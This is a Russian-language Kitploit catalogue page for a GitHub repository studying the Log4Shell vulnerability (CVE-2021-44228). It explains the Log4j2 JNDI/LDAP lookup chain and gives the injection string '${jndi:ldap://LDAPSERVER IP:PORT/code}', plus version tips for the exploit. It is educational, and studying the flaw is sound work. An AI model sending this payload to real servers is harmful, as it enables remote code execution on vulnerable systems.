Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44228 — Исследование уязвимости CVE-2021-44228 | Kitploit
Инструменты/GitHubGitHub/asd58584388/cve-2021-44228
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubasd58584388/cve-2021-44228

CVE-2021-44228

Исследование уязвимости CVE-2021-44228

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Анализ CVE-2021-44228

Как это работает?

Ниже приведен подробный процесс удаленной инъекции с использованием уязвимости log4shell. Сначала рассмотрим 3 части, которые необходимо знать:

  1. Log4j2 позволяет вести логирование данных с помощью функции message lookup substitution, где сообщения лога могут включать данные, динамически извлекаемые из различных источников. (Поддерживает JNDI Lookup)

  2. JNDI Lookup: Позволяет получать данные через API Java Naming and Directory Interface (JNDI), который может взаимодействовать с различными службами каталогов

  3. LDAP (Lightweight Directory Access Protocol): Используется в основном для доступа и управления службами каталогов через сеть.


Вот простой пример удаленного выполнения кода:

  1. Хакер настраивает как LDAP сервер (доступный по протоколу LDAP, хранящий ссылку на вредоносный Java код), так и HTTP сервер (место хранения вредоносного кода).

    1. Настройка HTTP сервера в каталоге, содержащем скомпилированный вредоносный код:

    2. Настройка LDAP сервера, хранящего ссылку:

      ldap

  2. Хакер отправляет вредоносный ввод (${jndi:ldap://LDAPSERVER IP:PORT/code}) в программную систему, где установлен log4j2

  3. Log4j2 использует функцию lookup для отправки запроса на LDAP сервер

  4. LDAP сервер перенаправляет запросы на HTTP серверы через ссылки на Java код, хранящиеся на LDAP серверах

  5. HTTP сервер отправляет вредоносный код в программную систему, и затем система выполняет вредоносный код.

Вредоносный код:

Выполнение вредоносного кода успешно:


ВАЖНО:

  1. Мы можем использовать не только LDAP сервер для удаленного выполнения кода, но и другие методы (например, RMI), пока log4j2 успешно выполняет message lookup substitution и выполняет вредоносный код

  2. Разные версии Java могут сделать процесс эксплуатации разным (здесь мы используем Java 1.8u112).

  3. Рекомендуется использовать ту же версию Java во вредоносном коде, что и в программном обеспечении (сервера, использующие log4j2), или, по крайней мере, не выше версии Java, используемой в программном обеспечении.

  4. Код lookup в Log4j2:

Скачать инструмент